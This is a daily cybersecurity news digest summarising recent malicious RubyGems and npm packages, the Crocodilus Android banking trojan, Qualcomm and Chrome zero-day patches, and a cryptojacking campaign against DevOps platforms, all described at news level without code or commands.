A geopolitical ripple just triggered a global software supply chain scare. Socket has exposed a malicious campaign in the RubyGems ecosystem where two lookalike Fastlane plugins were used to siphon off Telegram bot tokens and messages. Timed around Vietnam’s Telegram ban, the attacker used typosquatting and subtle code tweaks - targeting affected developers and putting downstream users at risk worldwide.

A silent zero-day is loose in the wild, and Google’s racing to contain it. Chrome users are urged to update immediately after Google issued an emergency patch for a high-severity flaw in the V8 JavaScript engine that’s already being exploited.

Some attackers mine crypto, JINX-0132 mines misconfigurations. This threat actor is running a stealthy cryptojacking campaign against DevOps platforms, exploiting exposed defaults and overlooked RCE flaws. They stay under the radar while deploying XMRig miners across poorly secured cloud setups, many of which are still internet-facing and misconfigured.

Top Malware Reported in the Last 24 Hours

Supply chain attack targets RubyGems

Socket uncovered a supply chain attack in the RubyGems ecosystem involving two malicious gems, fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram, which impersonate legitimate Fastlane plugins. These gems exfiltrate Telegram bot tokens and messages by redirecting API calls through a threat actor-controlled proxy, exploiting increased demand following Vietnam's nationwide Telegram ban. The attack leverages typosquatting techniques and minimal code changes, making detection difficult. The threat actor, using Vietnamese aliases, strategically aligned the attack with geopolitical events to target affected developers, resulting in potential global exposure for anyone using the malicious gems.

Another day of malicious npm packages 

Socket discovered four malicious npm packages—pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process—that target Binance Smart Chain (BSC) and Ethereum wallets. Created by the threat actor @crypto-exploit, these packages collectively received over 2,100 downloads. The first package, pancake_uniswap_validators_utils_snipe, was designed to drain crypto wallets by exfiltrating up to 85% of their balance using obfuscated JavaScript. The packages utilize environment variables to access sensitive data, including wallet addresses and private keys. The threat actor employs techniques like typosquatting and command obfuscation to evade detection and improve the effectiveness of their attacks.

Android malware Crocodilus evolves

A new Android banking trojan, Crocodilus, is actively targeting users in Europe, South America, and other regions, leveraging improved obfuscation techniques to evade detection. Initially discovered in March, Crocodilus masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps. It also exploits accessibility permissions to extract cryptocurrency wallet seed phrases. Recent campaigns have expanded to countries like Poland, Argentina, Brazil, India, Indonesia, and the U.S., using tactics like fake Facebook ads and malicious websites to distribute the malware. New features include adding fake contacts to victims' contact lists to bypass fraud detection and collecting cryptocurrency wallet seed phrases via an automated parser.

Top Vulnerabilities Reported in the Last 24 Hours

Qualcomm patches three Adreno GPU bugs

Qualcomm has addressed three zero-day vulnerabilities in its Adreno GPUs that could be exploited in Android devices. Two flaws, CVE-2025-21479 and CVE-2025-21480, involve authorization issues leading to memory corruption, both rated CVSS 8.6. The third vulnerability, CVE-2025-27038, is a use-after-free issue in Chrome's GPU drivers, rated CVSS 7.5. Qualcomm has urged OEMs to deploy patches promptly due to indications of limited exploitation. 

Google patches Chrome 0-day

Google has released an emergency update for Chrome to fix a high-severity zero-day vulnerability (CVE-2025-5419) in the V8 JavaScript engine, which is actively being exploited. This marks the third zero-day vulnerability addressed in 2025, following similar issues patched in March and May. Users are encouraged to update their browsers to versions 137.0.7151.68/.69 for Windows/Mac and 137.0.7151.68 for Linux. Detailed information about the exploits will be withheld until a majority of users have applied the fix.

Threats in Spotlight

Cryptojacking campaign targets DevOps tools

The threat actor JINX-0132 is behind a widespread cryptojacking campaign targeting popular DevOps applications, including Nomad, Consul, Docker, and Gitea. This campaign exploits known misconfigurations and vulnerabilities in these tools to deploy XMRig mining software on compromised servers. JINX-0132 employs a unique methodology by avoiding traditional IOCs, using off-the-shelf tools downloaded from public GitHub repositories instead of custom malware. They take advantage of Nomad's insecure default configurations, allowing unauthorized users to submit jobs that execute malicious commands. In Gitea, they exploit vulnerabilities such as post-authentication remote code execution, particularly in older versions. Approximately 25% of cloud environments use these technologies, with 5% directly exposed to the internet, and 30% of those misconfigured.